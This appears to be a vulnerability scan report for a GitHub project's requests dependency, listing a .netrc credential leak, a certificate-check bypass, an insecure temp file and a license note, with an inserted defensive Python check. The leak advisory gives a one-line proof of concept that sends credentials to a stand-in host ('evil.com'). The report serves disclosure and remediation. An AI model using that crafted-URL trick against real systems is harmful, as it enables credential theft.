Vulnerabilities: 3 via 3 paths
Dependencies: 7
Source: GitHub
Commit: 87902312

medium severity

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.32.4.

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.

Note:

This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).

PoC

requests.get('http://example.com:@evil.com/')
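To make the host confusion concrete from the defender's side, here is an added example (not code from the requests project or from the scanned repository). It reconstructs, as a stated assumption, the port-stripping host lookup that affected versions used for .netrc and contrasts it with the real connection host, so an application can pre-screen URLs before handing them to a client that reads .netrc; the .netrc contents are constructed sample data.

```python
from urllib.parse import urlparse

# Constructed sample .netrc contents (not a real credential store), keyed by
# machine name the way the netrc module exposes them.
SAMPLE_NETRC = {
    "example.com": ("alice", "s3cret"),
}


def flawed_netrc_host(url: str) -> str:
    """Host used for the .netrc lookup in affected versions.

    Assumption: reconstructs the vulnerable logic, which took the URL's
    netloc and cut it at the first ':' to strip a port. For the netloc
    'example.com:@evil.com' that yields 'example.com'.
    """
    return urlparse(url).netloc.split(":")[0]


def actual_host(url: str) -> str:
    """Host the connection is really made to (what the fixed lookup uses)."""
    return urlparse(url).hostname or ""


def netrc_host_is_consistent(url: str) -> bool:
    """Pre-flight check: True when the lookup host and the real host agree,
    so a .netrc entry cannot be steered to a different machine."""
    return flawed_netrc_host(url) == actual_host(url)


def credentials_leaked_to(url: str, netrc=SAMPLE_NETRC):
    """Return (real_host, credential_owner) when the flawed lookup would
    attach credentials belonging to a machine other than the one contacted,
    otherwise None."""
    lookup = flawed_netrc_host(url)
    real = actual_host(url)
    if lookup != real and lookup in netrc:
        return real, lookup
    return None


if __name__ == "__main__":
    for u in ("https://example.com/api", "http://example.com:@evil.com/"):
        print(u, netrc_host_is_consistent(u), credentials_leaked_to(u))
```

Rejecting any URL for which netrc_host_is_consistent() is False (or simply any URL carrying userinfo) is a cheap guard for code paths that accept URLs from untrusted input while the upgrade to 2.32.4 is rolled out.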

Remediation

Upgrade requests to version 2.32.4 or higher.

medium severity

Always-Incorrect Control Flow Implementation

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.32.2.

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

  1. For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.

  2. For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.

  3. This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.

Remediation

Upgrade requests to version 2.32.2 or higher.

medium severity (new)

Insecure Temporary File

  • Vulnerable module: requests
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0
    Remediation: Upgrade to requests@2.33.0.

Overview

Affected versions of this package are vulnerable to Insecure Temporary File via the extract_zipped_paths function. An attacker can leverage unauthorized file replacement by pre-creating a malicious file in the system's temporary directory prior to extraction.

Note: Only applications that call extract_zipped_paths() directly are impacted.

Workaround

This vulnerability can be mitigated by setting the TMPDIR environment variable to a directory with restricted write access.

Remediation

Upgrade requests to version 2.33.0 or higher.

medium severity

MPL-2.0 license

  • Module: certifi
  • Introduced through: requests@2.31.0

Detailed paths

  • Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 requests@2.31.0 certifi@2026.2.25